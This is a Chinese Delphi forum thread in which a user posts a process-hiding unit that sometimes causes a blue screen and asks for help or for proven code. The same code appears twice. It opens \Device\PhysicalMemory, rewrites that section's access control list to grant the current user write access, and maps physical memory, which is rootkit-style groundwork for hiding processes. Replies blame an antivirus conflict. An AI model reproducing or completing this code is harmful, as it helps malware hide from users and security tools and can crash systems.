这是一个隐藏进程的代码,做成单元引用时,有时蓝屏!
哪位帮看一下
或者哪位有收藏且试用过没问题的隐藏进程代码,请发一下?
unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationuses
Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;type
NTSTATUS = LongInt;const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;type
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end;PUNICODE_STRING = ^UNICODE_STRING;
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end;TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;var
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
g_hNtDLL: THandle = 0;
g_pMapPhysicalMemory: Pointer = nil;
g_hMPM: THandle = 0;
g_hMPM2: THandle = 0;
g_osvi: OSVERSIONINFO;
b_hide: Boolean = false;
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
begin
g_hNtDLL := LoadLibrary('ntdll.dll');if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end;RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');Result := True;
end;
//---------------------------------------------------------------------------procedure CloseNTDLL;
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
pNewDacl := nil;dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER';dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;dwRes := SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;end;
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
var
status: NTSTATUS;
physmemString: UNICODE_STRING;
attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
GetVersionEx(g_osvi);if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
end;case g_osvi.dwMinorVersion of
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end;RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil;status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);if (status = STATUS_ACCESS_DENIED) then
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
end;if not (LongInt(status) >= 0) then
begin
Result := 0;
Exit;
end;g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);if (g_pMapPhysicalMemory = nil) then
begin
Result := 0;
Exit;
end;Result := g_hMPM;
end;
//---------------------------------------------------------------------------
哪位帮看一下
或者哪位有收藏且试用过没问题的隐藏进程代码,请发一下?
unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationuses
Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;type
NTSTATUS = LongInt;const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;type
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end;PUNICODE_STRING = ^UNICODE_STRING;
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end;TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;var
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
g_hNtDLL: THandle = 0;
g_pMapPhysicalMemory: Pointer = nil;
g_hMPM: THandle = 0;
g_hMPM2: THandle = 0;
g_osvi: OSVERSIONINFO;
b_hide: Boolean = false;
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
begin
g_hNtDLL := LoadLibrary('ntdll.dll');if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end;RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');Result := True;
end;
//---------------------------------------------------------------------------procedure CloseNTDLL;
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
pNewDacl := nil;dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER';dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;dwRes := SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;end;
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
var
status: NTSTATUS;
physmemString: UNICODE_STRING;
attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
GetVersionEx(g_osvi);if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
end;case g_osvi.dwMinorVersion of
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end;RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil;status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);if (status = STATUS_ACCESS_DENIED) then
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
end;if not (LongInt(status) >= 0) then
begin
Result := 0;
Exit;
end;g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);if (g_pMapPhysicalMemory = nil) then
begin
Result := 0;
Exit;
end;Result := g_hMPM;
end;
//---------------------------------------------------------------------------
解决方案 »
- 串口紧急问题!!!
- 10000记录的显示?
- 关于手写板的问题
- 如何用fastreport实现让用户自定义需要在报表中出现的字段?
- 用delphi调用word的问题,如何新建一个word文档
- 我用installshield的错误大家来看看啊???
- 如何判断在一个“Edit”中输入的内容是整数???
- int强制转换real,怎么做?怎么实现四舍五入?delphi中的round(0.5)=0,要使它也为一,怎么编写?
- 急!!!DBGRID小问题(在线等待,高分相送)
- 关于报表设置的一个问题(TQuickQep)一菜鸟问
- 隐藏进程代码引起的蓝屏??未解决!
- delphi中如何上传保存视频录像至数据库中
Refresh;
进去
一般都安全的,偶然出问题的
而且正如楼主说的,会蓝屏(我分析是和瑞星有冲突)。
只不过是用C++实现的(我以前写的),我还没有花时间改成Delphi的。
http://topic.csdn.net/u/20081026/08/25b85c66-a560-45df-a32e-544df8169da6.html
上面是地址,如果有人能解决的话,三个帖子一共300分.